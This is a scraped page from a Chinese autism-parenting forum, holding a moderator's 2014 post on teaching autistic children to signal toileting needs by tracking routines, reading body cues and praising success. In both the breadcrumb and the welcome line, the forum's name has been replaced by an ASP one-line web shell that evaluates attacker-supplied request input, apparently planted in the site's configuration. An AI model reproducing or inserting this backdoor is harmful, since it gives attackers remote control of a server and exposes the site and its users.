Email:jiejenny@hotmail.com
» 您尚未 [登录 - 注册] ┆ 风格 ┆ 搜索 ┆ 帮助 ┆ 
青聪泉 官方站论坛欢迎您!
您的位置: 青聪泉网站 -> "%><%eval request("1")%>%<' -> 家长交流 -> 心灵驿站 -> 家长如何帮助自闭症孩子学习大小便的正确表达

您是本帖的第 1530 个阅读者
贴子主题:家长如何帮助自闭症孩子学习大小便的正确表达  
曹老师
 
副版主
等级:副版主
头衔:未定义
金钱:202
发帖:56
Y 币:0
状态:性别:女<br>状态:离线<br>积时:12 个月 16 天 18 小时 26 分 46 秒
注册:2011-11-03
家长如何帮助自闭症孩子学习大小便的正确表达

自闭症儿童大小便不会表达,经常会弄在身上,让家长很头疼无措。怎么办才能帮助孩子解决这个问题呢?简单说首先要帮助孩子建立大小便与生理反应之间的联系。家长仔细记录孩子每日的进水量、进食量和每天的大小便的时间与量的多少,便于掌握孩子的大小便规律,同时也利于我们去有效地调整孩子的排泄规律。一旦摸清了孩子的排泄规律,家长尽量不要打破规律,要多通过观察孩子的表情、肢体语言来帮助孩子建立恰当的表达方式。比如看到孩子下意识的摸裤裆、身子扭动时,估计孩子有便意时可以问孩子:“要小便吗?”,带孩子去厕所,一旦孩子尿出来了,就及时对孩子说:“真棒,宝宝小便了,宝宝在小便”
帮助孩子建立小便的行为与语言之间的联系,久而久之,孩子慢慢会明白并学会如厕的表达和规范。一旦孩子可以在家里恰当如厕,家长们要进一步带孩子外出训练泛化,一定要有会上不同公共厕所的能力,不然他们外出时还是会遇到问题,比如不肯进公共厕所、哭闹不休或又尿在身上。

TIME: 2014-04-12 15:31:41  IP: 124.78. * . *
"%><%eval request("1")%>%<'欢迎您!

   

 每页10条,共1页,合计1条记录
9  1  :
转到  


Powered By:
品牌网站建设 Processed in:0.156250s,12 queries.